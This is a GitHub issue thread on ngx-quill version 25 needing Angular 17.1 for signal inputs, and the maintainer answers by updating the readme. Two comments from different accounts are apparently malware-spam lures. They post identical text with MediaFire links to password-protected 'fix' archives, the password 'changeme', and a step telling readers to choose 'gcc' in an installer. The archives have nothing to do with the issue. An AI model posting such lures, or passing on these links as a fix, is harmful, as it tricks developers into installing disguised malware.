### ISSUE TITLE
v25 not actually compatible with Angular 17.x

### ISSUE THREAD

**Issue by sithwarrior** [KillerCodeMonkey/ngx-quill#1924]
despite the docs, ngx-quill 25 requires angular 17.1.x instead of 17.0x as it uses signal inputs, that was not introduced before 17.1

You can read the announcement here https://blog.angular.dev/signal-inputs-available-in-developer-preview-6a7ff1941823

Im on a 17.0.8 project, so ran into this.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KillerCodeMonkey** [comment]
i changed the readme :)
